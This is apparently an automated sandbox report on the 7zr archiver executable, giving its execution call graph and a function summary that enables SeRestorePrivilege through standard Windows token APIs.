                            • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction ID: 4542299a2f370ab38de0aa4c30c05e58e0fa4624eee564906039fba88fe567e2
                            • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction Fuzzy Hash: 82519071A042099BCF00DF96D980ADEB7B1FF1531CF10841AE81167E90FB75A949DBA2

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.3%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:31
74590->74435 74591->74425 74592->74430 74593->74439 74594->74438 74595->74451 74596->74455 74597->74457 74598->74463 74599->74422 74600->74403 74601->74405 74603 6e3a3b 74602->74603 74608 6e2722 74602->74608 74642 6e3bd9 free ctype 74603->74642 74605 6e3a42 74606 6e3a67 74605->74606 74607 6e3a52 _CxxThrowException 74605->74607 74609 6e3a6f 74605->74609 74643 710551 malloc _CxxThrowException free memcpy ctype 74606->74643 74607->74606 74608->74424 74608->74427 74609->74608 74644 6e3b76 malloc _CxxThrowException __EH_prolog ctype 74609->74644 74612->74424 74613->74440 74614->74449 74615->74453 74616->74452 74617->74418 74618->74410 74619->74417 74620->74539 74622 6d2ea0 74621->74622 74623 6d2ba6 2 API calls 74622->74623 74624 6d2eaf 74623->74624 74625 6e2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74624->74625 74625->74547 74626->74552 74627->74552 74628->74552 74629->74552 74630->74558 74631->74551 74632->74568 74633->74568 74635 710513 74634->74635 74636 7104df 74634->74636 74635->74575 74637 7104e8 _CxxThrowException 74636->74637 74638 7104fd 74636->74638 74637->74638 74641 710551 malloc _CxxThrowException free memcpy ctype 74638->74641 74640->74575 74641->74635 74642->74605 74643->74609 74644->74609 74646 6f7f14 74645->74646 74648 6f7ef7 74645->74648 74646->74469 74647 6f7193 free 74647->74648 74648->74646 74648->74647 74686 6d1e40 free 74648->74686 74651 6d2e04 2 API calls 74650->74651 74652 6f7103 74651->74652 74652->74469 74654 6f7a4a __EH_prolog 74653->74654 74687 6d361b 6 API calls 2 library calls 74654->74687 74656 6f7a78 74688 6d361b 6 API calls 2 library calls 74656->74688 74658 6f7b20 74690 702db9 free ctype 74658->74690 74660 6d2e04 malloc _CxxThrowException 74670 6f7a83 74660->74670 74661 6f7b2b 74691 702db9 free ctype 74661->74691 74663 6f7b37 74663->74469 74664 6d2fec 3 API calls 74664->74670 74665 7104d2 5 API calls 74665->74670 74666 6d2fec 3 API calls 74667 6f7aca wcscmp 74666->74667 74667->74670 74669 6d1e40 free ctype 
74669->74670 74670->74658 74670->74660 74670->74664 74670->74665 74670->74666 74670->74669 74689 6f7955 malloc _CxxThrowException __EH_prolog ctype 74670->74689 74671->74469 74673 7104d2 5 API calls 74672->74673 74674 6e12ad 74673->74674 74675 6d1e0c ctype 2 API calls 74674->74675 74676 6e12b4 74675->74676 74676->74469 74677->74469 74679 6f719d __EH_prolog 74678->74679 74692 702db9 free ctype 74679->74692 74681 6f71b3 74693 6f71d5 free __EH_prolog ctype 74681->74693 74683 6f71bf 74694 6d1e40 free 74683->74694 74685 6f71c7 74685->74469 74686->74648 74687->74656 74688->74670 74689->74670 74690->74661 74691->74663 74692->74681 74693->74683 74694->74685 74696 6d2e57 74695->74696 74697 6d2ba6 2 API calls 74696->74697 74698 6d1fda 74697->74698 74699 6d2010 74698->74699 74700 6d2033 10 API calls 74699->74700 74701 6d2022 fputs 74700->74701 74701->74490 74702->74492 74703->74494 74706 6d7b20 74709 6d7ab2 74706->74709 74710 6d7ac5 74709->74710 74717 6d759a 74710->74717 74713 6d7aeb SetFileTime 74714 6d7b03 74713->74714 74731 6d7919 74714->74731 74718 6d75a4 __EH_prolog 74717->74718 74747 6d764c 74718->74747 74720 6d7632 74720->74713 74720->74714 74721 6d75af 74721->74720 74722 6d75e9 74721->74722 74723 6d75d4 CreateFileW 74721->74723 74722->74720 74724 6d2e04 2 API calls 74722->74724 74723->74722 74725 6d75fb 74724->74725 74750 6d8b4a 74725->74750 74727 6d7611 74728 6d762a 74727->74728 74729 6d7615 CreateFileW 74727->74729 74755 6d1e40 free 74728->74755 74729->74728 74732 6d7aac 74731->74732 74733 6d793c 74731->74733 74733->74732 74734 6d7945 DeviceIoControl 74733->74734 74735 6d79e6 74734->74735 74739 6d7969 74734->74739 74736 6d79ef DeviceIoControl 74735->74736 74745 6d7a14 74735->74745 74737 6d7a22 DeviceIoControl 74736->74737 74736->74745 74738 6d7a44 DeviceIoControl 74737->74738 74737->74745 74738->74745 74739->74735 74741 6d79a7 74739->74741 74873 6d9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 74741->74873 74742 6d7aa5 74744 6d77de 5 API calls 74742->74744 
74744->74732 74745->74732 74874 6d780d 8 API calls ctype 74745->74874 74746 6d79d0 74746->74735 74748 6d7656 CloseHandle 74747->74748 74749 6d7661 74747->74749 74748->74749 74749->74721 74756 6d8b80 74750->74756 74752 6d8b6e 74752->74727 74754 6d2f88 3 API calls 74754->74752 74755->74720 74757 6d8b8a __EH_prolog 74756->74757 74758 6d8c7b 74757->74758 74764 6d8be1 74757->74764 74803 6d8b55 74757->74803 74759 6d8d23 74758->74759 74761 6d8c8f 74758->74761 74760 6d8e8a 74759->74760 74763 6d8d3b 74759->74763 74762 6d2e47 2 API calls 74760->74762 74761->74763 74769 6d8c9e 74761->74769 74765 6d8e96 74762->74765 74766 6d2e04 2 API calls 74763->74766 74767 6d2e47 2 API calls 74764->74767 74764->74803 74773 6d2e47 2 API calls 74765->74773 74768 6d8d43 74766->74768 74770 6d8c05 74767->74770 74853 6d6332 6 API calls 2 library calls 74768->74853 74772 6d2e47 2 API calls 74769->74772 74776 6d8c24 74770->74776 74777 6d8c17 74770->74777 74781 6d8ca7 74772->74781 74775 6d8eb8 74773->74775 74774 6d8d52 74837 6d8d56 74774->74837 74854 6d859e malloc _CxxThrowException free _CxxThrowException 74774->74854 74865 6d8f57 memmove 74775->74865 74784 6d2e47 2 API calls 74776->74784 74843 6d1e40 free 74777->74843 74785 6d2e47 2 API calls 74781->74785 74783 6d8ec4 74786 6d8ede 74783->74786 74787 6d8ec8 74783->74787 74788 6d8c35 74784->74788 74790 6d8cd0 74785->74790 74868 6d3221 malloc _CxxThrowException free _CxxThrowException 74786->74868 74866 6d1e40 free 74787->74866 74844 6d8f57 memmove 74788->74844 74848 6d8f57 memmove 74790->74848 74793 6d8eeb 74869 6d31e5 malloc _CxxThrowException free _CxxThrowException 74793->74869 74795 6d8ed0 74867 6d1e40 free 74795->74867 74796 6d8c41 74797 6d8c6b 74796->74797 74845 6d31e5 malloc _CxxThrowException free _CxxThrowException 74796->74845 74847 6d1e40 free 74797->74847 74798 6d8cdc 74802 6d8d13 74798->74802 74849 6d3221 malloc _CxxThrowException free _CxxThrowException 74798->74849 74852 6d1e40 free 74802->74852 74803->74752 74803->74754 74806 6d8f06 
74870 6d31e5 malloc _CxxThrowException free _CxxThrowException 74806->74870 74807 6d8c73 74872 6d1e40 free 74807->74872 74809 6d2e04 2 API calls 74813 6d8ddf 74809->74813 74810 6d8c60 74846 6d31e5 malloc _CxxThrowException free _CxxThrowException 74810->74846 74812 6d8ced 74850 6d31e5 malloc _CxxThrowException free _CxxThrowException 74812->74850 74817 6d8e0e 74813->74817 74820 6d8df1 74813->74820 74815 6d8f11 74871 6d1e40 free 74815->74871 74821 6d2f88 3 API calls 74817->74821 74855 6d3199 malloc _CxxThrowException free _CxxThrowException 74820->74855 74826 6d8e0c 74821->74826 74822 6d8d65 74822->74809 74822->74837 74823 6d8d08 74851 6d31e5 malloc _CxxThrowException free _CxxThrowException 74823->74851 74857 6d8f57 memmove 74826->74857 74827 6d8e03 74856 6d3199 malloc _CxxThrowException free _CxxThrowException 74827->74856 74830 6d8e22 74831 6d8e26 74830->74831 74832 6d8e3b 74830->74832 74858 6d3221 malloc _CxxThrowException free _CxxThrowException 74830->74858 74863 6d1e40 free 74831->74863 74859 6d8f34 malloc _CxxThrowException 74832->74859 74836 6d8e49 74860 6d31e5 malloc _CxxThrowException free _CxxThrowException 74836->74860 74864 6d1e40 free 74837->74864 74839 6d8e56 74861 6d1e40 free 74839->74861 74841 6d8e62 74862 6d31e5 malloc _CxxThrowException free _CxxThrowException 74841->74862 74843->74803 74844->74796 74845->74810 74846->74797 74847->74807 74848->74798 74849->74812 74850->74823 74851->74802 74852->74807 74853->74774 74854->74822 74855->74827 74856->74826 74857->74830 74858->74832 74859->74836 74860->74839 74861->74841 74862->74831 74863->74837 74864->74803 74865->74783 74866->74795 74867->74803 74868->74793 74869->74806 74870->74815 74871->74807 74872->74803 74873->74746 74874->74742 74875 6dc3bd 74876 6dc3ca 74875->74876 74878 6dc3db 74875->74878 74876->74878 74879 6d1e40 free 74876->74879 74879->74878 74880 6fcefb 74881 6fd0cc 74880->74881 74882 6fcf03 74880->74882 74882->74881 74927 6fcae9 VariantClear 74882->74927 74884 6fcf59 74884->74881 74928 
6fcae9 VariantClear 74884->74928 74886 6fcf71 74886->74881 74929 6fcae9 VariantClear 74886->74929 74888 6fcf87 74888->74881 74930 6fcae9 VariantClear 74888->74930 74890 6fcf9d 74890->74881 74931 6fcae9 VariantClear 74890->74931 74892 6fcfb3 74892->74881 74932 6fcae9 VariantClear 74892->74932 74894 6fcfc9 74894->74881 74933 6d4504 malloc _CxxThrowException 74894->74933 74896 6fcfdc 74897 6d2e04 2 API calls 74896->74897 74899 6fcfe7 74897->74899 74898 6fd009 74900 6fd07b 74898->74900 74902 6fd080 74898->74902 74903 6fd030 74898->74903 74899->74898 74901 6d2f88 3 API calls 74899->74901 74941 6d1e40 free 74900->74941 74901->74898 74938 6f7a0c CharUpperW 74902->74938 74906 6d2e04 2 API calls 74903->74906 74909 6fd038 74906->74909 74907 6fd0c4 74942 6d1e40 free 74907->74942 74908 6fd08b 74939 6efdbc 4 API calls 2 library calls 74908->74939 74911 6d2e04 2 API calls 74909->74911 74913 6fd046 74911->74913 74934 6efdbc 4 API calls 2 library calls 74913->74934 74914 6fd0a7 74916 6d2fec 3 API calls 74914->74916 74918 6fd0b3 74916->74918 74917 6fd057 74919 6d2fec 3 API calls 74917->74919 74940 6d1e40 free 74918->74940 74921 6fd063 74919->74921 74935 6d1e40 free 74921->74935 74923 6fd06b 74936 6d1e40 free 74923->74936 74925 6fd073 74937 6d1e40 free 74925->74937 74927->74884 74928->74886 74929->74888 74930->74890 74931->74892 74932->74894 74933->74896 74934->74917 74935->74923 74936->74925 74937->74900 74938->74908 74939->74914 74940->74900 74941->74907 74942->74881 74943 70c2e6 74944 70c52f 74943->74944 74947 70544f SetConsoleCtrlHandler 74944->74947 74946 70c53b 74947->74946 74948 71bf67 74949 71bf74 74948->74949 74950 71bf85 74948->74950 74949->74950 74954 71bf8c 74949->74954 74955 71bf96 __EH_prolog 74954->74955 74971 71d144 74955->74971 74959 71bfd0 74978 6d1e40 free 74959->74978 74961 71bfdb 74979 6d1e40 free 74961->74979 74963 71bfe6 74980 71c072 free ctype 74963->74980 74965 71bff4 74981 6eaafa free VariantClear ctype 74965->74981 74967 71c023 74982 6f73d2 free 
VariantClear __EH_prolog ctype 74967->74982 74969 71bf7f 74970 6d1e40 free 74969->74970 74970->74950 74973 71d14e __EH_prolog 74971->74973 74983 71d1b7 74973->74983 74976 71bfc5 74977 6d1e40 free 74976->74977 74977->74959 74978->74961 74979->74963 74980->74965 74981->74967 74982->74969 74991 71d23c 74983->74991 74985 71d1ed 74998 6d1e40 free 74985->74998 74987 71d209 74999 6d1e40 free 74987->74999 74989 71d180 74990 718e04 memset 74989->74990 74990->74976 75000 71d2b8 74991->75000 74996 71d275 74996->74985 74997 71d25e 75017 6d1e40 free 74997->75017 74998->74987 74999->74989 75019 6d1e40 free 75000->75019 75002 71d2c8 75020 6d1e40 free 75002->75020 75004 71d2dc 75021 6d1e40 free 75004->75021 75006 71d2e7 75022 6d1e40 free 75006->75022 75008 71d2f2 75023 6d1e40 free 75008->75023 75010 71d2fd 75024 6d1e40 free 75010->75024 75012 71d308 75025 6d1e40 free 75012->75025 75014 71d313 75015 71d246 75014->75015 75026 6d1e40 free 75014->75026 75015->74997 75018 6d1e40 free 75015->75018 75017->74996 75018->74997 75019->75002 75020->75004 75021->75006 75022->75008 75023->75010 75024->75012 75025->75014 75026->75015 75027 767da0 WaitForSingleObject 75028 767dc1 75027->75028 75029 767dbb GetLastError 75027->75029 75030 767dce CloseHandle 75028->75030 75031 767ddf 75028->75031 75029->75028 75030->75031 75032 767dd9 GetLastError 75030->75032 75032->75031 75033 756ba3 VirtualFree 75034 70a42c 75035 70a435 fputs 75034->75035 75036 70a449 75034->75036 75192 6d1fa0 fputc 75035->75192 75193 70545d 75036->75193 75040 6d2e04 2 API calls 75041 70a4a1 75040->75041 75197 6f1858 75041->75197 75043 70a4c9 75259 6d1e40 free 75043->75259 75045 70a4d8 75046 70a4ee 75045->75046 75048 70c7d7 ctype 6 API calls 75045->75048 75047 70a50e 75046->75047 75260 7057fb 75046->75260 75270 70c73e 75047->75270 75048->75046 75053 70ac17 75426 702db9 free ctype 75053->75426 75054 6d1e0c ctype 2 API calls 75056 70a53a 75054->75056 75058 70a54d 75056->75058 75396 70b0fa malloc _CxxThrowException __EH_prolog 
75056->75396 75057 70ac23 75059 70ac3a 75057->75059 75061 70ac35 75057->75061 75065 6d2fec 3 API calls 75058->75065 75428 70b96d _CxxThrowException 75059->75428 75427 70b988 33 API calls __aulldiv 75061->75427 75064 70ac42 75429 6d1e40 free 75064->75429 75069 70a586 75065->75069 75067 70ac4d 75068 6f3247 free 75067->75068 75070 70ac5d 75068->75070 75288 70ad06 75069->75288 75430 6d1e40 free 75070->75430 75074 70ac7d 75431 6d11c2 free __EH_prolog ctype 75074->75431 75078 70ac89 75079 6e3a29 5 API calls 75081 70a62e 75079->75081 75083 6d2e04 2 API calls 75081->75083 75171 70aae5 75425 702db9 free ctype 75171->75425 75192->75036 75194 705473 75193->75194 75195 705466 75193->75195 75194->75040 75434 6d275e malloc _CxxThrowException free ctype 75195->75434 75198 6f1862 __EH_prolog 75197->75198 75435 6f021a 75198->75435 75203 6f18b9 75449 6f1aa5 free __EH_prolog ctype 75203->75449 75204 6f1935 75454 6f1aa5 free __EH_prolog ctype 75204->75454 75207 6f18c7 75450 702db9 free ctype 75207->75450 75208 6f1944 75230 6f1966 75208->75230 75455 6f1d73 5 API calls __EH_prolog 75208->75455 75211 6f18d3 75211->75043 75213 7104d2 5 API calls 75219 6f18db 75213->75219 75214 6f1958 _CxxThrowException 75214->75230 75215 6f19be 75462 6ff1f1 malloc _CxxThrowException free _CxxThrowException 75215->75462 75218 6d2e04 2 API calls 75218->75230 75219->75204 75219->75213 75451 6f0144 malloc _CxxThrowException free _CxxThrowException 75219->75451 75452 6d1524 malloc _CxxThrowException __EH_prolog ctype 75219->75452 75453 6d1e40 free 75219->75453 75220 6f19d6 75222 6f7ebb free 75220->75222 75224 6f19e1 75222->75224 75225 6e12d4 4 API calls 75224->75225 75227 6f19ea 75225->75227 75226 7104d2 5 API calls 75226->75230 75228 6f7ebb free 75227->75228 75231 6f19f7 75228->75231 75230->75215 75230->75218 75230->75226 75456 6d631f 75230->75456 75460 6d1524 malloc _CxxThrowException __EH_prolog ctype 75230->75460 75461 6d1e40 free 75230->75461 75233 6e12d4 4 API calls 75231->75233 75240 6f19ff 75233->75240 
75234 6f1a4f 75464 6d1e40 free 75234->75464 75236 6d1524 malloc _CxxThrowException 75236->75240 75237 6f1a57 75465 702db9 free ctype 75237->75465 75239 6f1a64 75466 702db9 free ctype 75239->75466 75240->75234 75240->75236 75243 6f1a83 75240->75243 75463 6d42e3 CharUpperW 75240->75463 75467 6f1d73 5 API calls __EH_prolog 75243->75467 75245 6f1a97 _CxxThrowException 75246 6f1aa5 __EH_prolog 75245->75246 75468 6d1e40 free 75246->75468 75248 6f1ac8 75469 6f02e8 free ctype 75248->75469 75250 6f1ad1 75470 6f1eab free __EH_prolog ctype 75250->75470 75252 6f1add 75471 6d1e40 free 75252->75471 75254 6f1ae5 75472 6d1e40 free 75254->75472 75256 6f1aed 75473 702db9 free ctype 75256->75473 75258 6f1afa 75258->75043 75259->75045 75261 705805 __EH_prolog 75260->75261 75262 705847 75261->75262 75263 6d26dd 2 API calls 75261->75263 75262->75047 75264 705819 75263->75264 75653 705678 75264->75653 75268 70583f 75670 6d1e40 free 75268->75670 75271 70c748 __EH_prolog 75270->75271 75272 70c7d7 ctype 6 API calls 75271->75272 75273 70c75d 75272->75273 75687 6d1e40 free 75273->75687 75275 70c768 75688 6f2c0b 75275->75688 75279 70c77d 75694 6d1e40 free 75279->75694 75281 70c785 75695 6d1e40 free 75281->75695 75283 70c78d 75696 6d1e40 free 75283->75696 75285 70c795 75286 6f2c0b ctype free 75285->75286 75287 70a51d 75286->75287 75287->75054 75287->75171 75289 70ad29 2 API calls 75288->75289 75290 70a5d8 75289->75290 75291 70bf3e 75290->75291 75292 6d2fec 3 API calls 75291->75292 75293 70bf85 75292->75293 75294 6d2fec 3 API calls 75293->75294 75295 70a5ee 75294->75295 75295->75079 75396->75058 75425->75053 75426->75057 75427->75059 75428->75064 75429->75067 75430->75074 75431->75078 75434->75194 75436 6f0224 __EH_prolog 75435->75436 75474 6e3d66 75436->75474 75439 6f062e 75445 6f0638 __EH_prolog 75439->75445 75440 6f06de 75561 6f019a malloc _CxxThrowException free memcpy 75440->75561 75442 6f06e6 75562 6f1453 26 API calls 2 library calls 75442->75562 75443 6f01bc malloc _CxxThrowException free 
_CxxThrowException memcpy 75443->75445 75445->75440 75445->75443 75448 6f06ee 75445->75448 75490 6f0703 75445->75490 75560 702db9 free ctype 75445->75560 75448->75203 75448->75219 75449->75207 75450->75211 75451->75219 75452->75219 75453->75219 75454->75208 75455->75214 75457 6d9245 75456->75457 75601 6d90da 75457->75601 75460->75230 75461->75230 75462->75220 75463->75240 75464->75237 75465->75239 75466->75211 75467->75245 75468->75248 75469->75250 75470->75252 75471->75254 75472->75256 75473->75258 75485 76fb10 75474->75485 75476 6e3d70 GetCurrentProcess 75486 6e3e04 75476->75486 75478 6e3d8d OpenProcessToken 75479 6e3d9e LookupPrivilegeValueW 75478->75479 75480 6e3de3 75478->75480 75479->75480 75481 6e3dc0 AdjustTokenPrivileges 75479->75481 75482 6e3e04 CloseHandle 75480->75482 75481->75480 75483 6e3dd5 GetLastError 75481->75483 75484 6e3def 75482->75484 75483->75480 75484->75439 75485->75476 75487 6e3e0d 75486->75487 75488 6e3e11 CloseHandle 75486->75488 75487->75478 75489 6e3e21 75488->75489 75489->75478 75512 6f070d __EH_prolog 75490->75512 75491 6f0e1d 75598 6f0416 18 API calls 2 library calls 75491->75598 75493 6f0ea6 75600 71ec78 free ctype 75493->75600 75494 6f0d11 75592 6d7496 7 API calls 2 library calls 75494->75592 75497 6f0c13 75589 6d1e40 free 75497->75589 75499 6d2da9 2 API calls 75499->75512 75501 6f0c83 75501->75491 75501->75494 75502 6f0b40 75502->75445 75503 6f0de0 75594 702db9 free ctype 75503->75594 75504 6d2da9 2 API calls 75508 6f0ab5 75504->75508 75505 6f0e47 75505->75493 75599 6f117d 68 API calls 2 library calls 75505->75599 75506 6d2f1c 2 API calls 75515 6f0d29 75506->75515 75508->75497 75508->75504 75511 6d2e04 2 API calls 75508->75511 75525 6d2fec 3 API calls 75508->75525 75529 6f050b 44 API calls 75508->75529 75538 6f0c79 75508->75538 75545 6d1e40 free ctype 75508->75545 75580 6d2f4a malloc _CxxThrowException free ctype 75508->75580 75585 6d1089 malloc _CxxThrowException free _CxxThrowException 75508->75585 75586 6f13eb 5 API calls 2 
library calls 75508->75586 75587 6f0ef4 68 API calls 2 library calls 75508->75587 75588 702db9 free ctype 75508->75588 75590 6f0021 GetLastError 75508->75590 75510 6d2e04 2 API calls 75510->75512 75511->75508 75512->75499 75512->75501 75512->75502 75512->75508 75512->75510 75520 6d2fec 3 API calls 75512->75520 75532 6f0b26 75512->75532 75547 702db9 free ctype 75512->75547 75552 7104d2 malloc _CxxThrowException free _CxxThrowException memcpy 75512->75552 75555 6f0b48 75512->75555 75557 6d1524 malloc _CxxThrowException 75512->75557 75558 6d1e40 free ctype 75512->75558 75563 6d2f4a malloc _CxxThrowException free ctype 75512->75563 75564 6d1089 malloc _CxxThrowException free _CxxThrowException 75512->75564 75565 6f13eb 5 API calls 2 library calls 75512->75565 75566 6f050b 75512->75566 75571 6f0021 GetLastError 75512->75571 75572 6d49bd 9 API calls 2 library calls 75512->75572 75573 6f0306 12 API calls 75512->75573 75574 6eff00 5 API calls 2 library calls 75512->75574 75575 6f057d 16 API calls 2 library calls 75512->75575 75576 6f0f8e 24 API calls 2 library calls 75512->75576 75577 6d472e CharUpperW 75512->75577 75578 6e8984 malloc _CxxThrowException free _CxxThrowException memcpy 75512->75578 75579 6f0ef4 68 API calls 2 library calls 75512->75579 75515->75503 75515->75506 75518 6d2e04 2 API calls 75515->75518 75524 6d2fec 3 API calls 75515->75524 75531 6f0df3 75515->75531 75535 6f0df8 75515->75535 75537 6d1e40 free ctype 75515->75537 75593 6f117d 68 API calls 2 library calls 75515->75593 75516 6f0e02 75597 702db9 free ctype 75516->75597 75518->75515 75520->75512 75524->75515 75525->75508 75529->75508 75595 6d1e40 free 75531->75595 75581 6d1e40 free 75532->75581 75596 6d1e40 free 75535->75596 75537->75515 75591 6d1e40 free 75538->75591 75539 6f0b30 75582 6d1e40 free 75539->75582 75543 6f0b38 75583 6d1e40 free 75543->75583 75545->75508 75547->75512 75552->75512 75584 702db9 free ctype 75555->75584 75557->75512 75558->75512 75560->75445 75561->75442 75562->75448 
75563->75512 75564->75512 75565->75512 75567 6d6c72 44 API calls 75566->75567 75568 6f051e 75567->75568 75569 6f0575 75568->75569 75570 6d2f88 3 API calls 75568->75570 75569->75512 75570->75569 75571->75512 75572->75512 75573->75512 75574->75512 75575->75512 75576->75512 75577->75512 75578->75512 75579->75512 75580->75508 75581->75539 75582->75543 75583->75502 75584->75532 75585->75508 75586->75508 75587->75508 75588->75508 75589->75502 75590->75508 75591->75501 75592->75515 75593->75515 75594->75502 75595->75535 75596->75516 75597->75502 75598->75505 75599->75505 75600->75502 75602 6d90e4 __EH_prolog 75601->75602 75603 6d2f88 3 API calls 75602->75603 75605 6d90f7 75603->75605 75604 6d915d 75606 6d2e04 2 API calls 75604->75606 75605->75604 75610 6d9109 75605->75610 75607 6d9165 75606->75607 75608 6d91be 75607->75608 75611 6d9174 75607->75611 75647 6d6332 6 API calls 2 library calls 75608->75647 75613 6d2e47 2 API calls 75610->75613 75619 6d9155 75610->75619 75614 6d2f88 3 API calls 75611->75614 75612 6d917d 75640 6d91ca 75612->75640 75645 6d859e malloc _CxxThrowException free _CxxThrowException 75612->75645 75615 6d9122 75613->75615 75614->75612 75642 6d8f57 memmove 75615->75642 75619->75230 75620 6d914d 75644 6d1e40 free 75620->75644 75621 6d912e 75621->75620 75643 6d31e5 malloc _CxxThrowException free _CxxThrowException 75621->75643 75622 6d9185 75625 6d2e04 2 API calls 75622->75625 75626 6d9197 75625->75626 75627 6d919f 75626->75627 75628 6d91ce 75626->75628 75629 6d91b9 75627->75629 75646 6d1089 malloc _CxxThrowException free _CxxThrowException 75627->75646 75630 6d2f88 3 API calls 75628->75630 75648 6d3199 malloc _CxxThrowException free _CxxThrowException 75629->75648 75630->75629 75633 6d91e6 75649 6d8f57 memmove 75633->75649 75635 6d91ee 75636 6d91f2 75635->75636 75637 6d2fec 3 API calls 75635->75637 75651 6d1e40 free 75636->75651 75639 6d9212 75637->75639 75650 6d31e5 malloc _CxxThrowException free _CxxThrowException 75639->75650 75652 6d1e40 free 
75640->75652 75642->75621 75643->75620 75644->75619 75645->75622 75646->75629 75647->75612 75648->75633 75649->75635 75650->75636 75651->75640 75652->75619 75654 7056b1 75653->75654 75655 705689 75653->75655 75671 705593 75654->75671 75657 705593 6 API calls 75655->75657 75659 7056a5 75657->75659 75661 6d28a1 5 API calls 75659->75661 75661->75654 75663 70570e fputs 75669 6d1fa0 fputc 75663->75669 75665 7056ef 75666 705593 6 API calls 75665->75666 75667 705701 75666->75667 75668 705711 6 API calls 75667->75668 75668->75663 75669->75268 75670->75262 75672 7055ad 75671->75672 75673 6d28a1 5 API calls 75672->75673 75674 7055b8 75673->75674 75675 6d286d 5 API calls 75674->75675 75676 7055bf 75675->75676 75677 6d28a1 5 API calls 75676->75677 75678 7055c7 75677->75678 75679 705711 75678->75679 75680 705721 75679->75680 75681 7056e0 75679->75681 75682 6d28a1 5 API calls 75680->75682 75681->75663 75685 6d2881 malloc _CxxThrowException free memcpy _CxxThrowException 75681->75685 75683 70572b 75682->75683 75686 7055cd 6 API calls 75683->75686 75685->75665 75686->75681 75687->75275 75697 6d1e40 free 75688->75697 75690 6f2c16 75698 6d1e40 free 75690->75698 75692 6f2c1e 75693 6d1e40 free 75692->75693 75693->75279 75694->75281 75695->75283 75696->75285 75697->75690 75698->75692 76521 70acd3 76522 70ace0 76521->76522 76526 70acf1 76521->76526 76522->76526 76527 70acf8 76522->76527 76532 70c0b3 __EH_prolog 76527->76532 76528 70c0ed 76536 6d1e40 free 76528->76536 76530 70aceb 76534 6d1e40 free 76530->76534 76531 6f7193 free 76531->76532 76532->76528 76532->76531 76535 6d1e40 free 76532->76535 76534->76526 76535->76532 76536->76530 76537 74f190 76538 6d1e0c ctype 2 API calls 76537->76538 76539 74f1b0 76538->76539 76541 7569d0 76542 7569d4 76541->76542 76543 7569d7 malloc 76541->76543 76544 6fd948 76574 6fdac7 76544->76574 76546 6fd94f 76547 6d2e04 2 API calls 76546->76547 76548 6fd97b 76547->76548 76549 6d2e04 2 API calls 76548->76549 76550 6fd987 76549->76550 76554 6fd9e7 
76550->76554 76582 6d6404 76550->76582 76555 6fda0f 76554->76555 76556 6fda36 76554->76556 76607 6d1e40 free 76555->76607 76560 6fda94 76556->76560 76567 6d2da9 2 API calls 76556->76567 76571 7104d2 5 API calls 76556->76571 76609 6d1524 malloc _CxxThrowException __EH_prolog ctype 76556->76609 76610 6d1e40 free 76556->76610 76559 6fd9bf 76605 6d1e40 free 76559->76605 76611 6d1e40 free 76560->76611 76561 6fda17 76608 6d1e40 free 76561->76608 76565 6fd9c7 76606 6d1e40 free 76565->76606 76566 6fda9c 76612 6d1e40 free 76566->76612 76567->76556 76570 6fd9cf 76571->76556 76575 6fdad1 __EH_prolog 76574->76575 76576 6d2e04 2 API calls 76575->76576 76577 6fdb33 76576->76577 76578 6d2e04 2 API calls 76577->76578 76579 6fdb3f 76578->76579 76580 6d2e04 2 API calls 76579->76580 76581 6fdb55 76580->76581 76581->76546 76583 6d631f 9 API calls 76582->76583 76584 6d6414 76583->76584 76585 6d6423 76584->76585 76586 6d2f88 3 API calls 76584->76586 76587 6d2f88 3 API calls 76585->76587 76586->76585 76588 6d643d 76587->76588 76589 6e7e5a 76588->76589 76590 6e7e64 __EH_prolog 76589->76590 76613 6e8179 76590->76613 76593 6f7ebb free 76594 6e7e7f 76593->76594 76595 6d2fec 3 API calls 76594->76595 76596 6e7e9a 76595->76596 76597 6d2da9 2 API calls 76596->76597 76598 6e7ea7 76597->76598 76599 6d6c72 44 API calls 76598->76599 76600 6e7eb7 76599->76600 76618 6d1e40 free 76600->76618 76602 6e7ecb 76603 6e7ed8 76602->76603 76619 6d757d GetLastError 76602->76619 76603->76554 76603->76559 76605->76565 76606->76570 76607->76561 76608->76570 76609->76556 76610->76556 76611->76566 76612->76570 76617 6e8906 76613->76617 76614 6e7e77 76614->76593 76617->76614 76620 6e8804 free ctype 76617->76620 76621 6d1e40 free 76617->76621 76618->76602 76619->76603 76620->76617 76621->76617 76622 6db144 76623 6db153 76622->76623 76625 6db159 76622->76625 76624 6e11b4 107 API calls 76623->76624 76624->76625 76626 6fa7c5 76634 6fa96b 76626->76634 76637 6fa7e9 76626->76637 76627 6fade3 76731 6d1e40 free 76627->76731 

                            Control-flow Graph: function 6d9313-6d9398 (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, CloseHandle)
                            APIs
                            • GetCurrentProcess.KERNEL32(00000020,006E1EC5,?,7597AB50,?,?,?,?,006E1EC5,006E1CEF), ref: 006D9329
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,006E1EC5,006E1CEF), ref: 006D9330
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 006D9342
                            • AdjustTokenPrivileges.KERNELBASE(006E1EC5,00000000,?,00000000,00000000,00000000), ref: 006D9368
                            • GetLastError.KERNEL32 ref: 006D9372
                            • CloseHandle.KERNELBASE(006E1EC5,?,?,?,?,006E1EC5,006E1CEF), ref: 006D9388
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeRestorePrivilege
                            • API String ID: 3398352648-1684392131
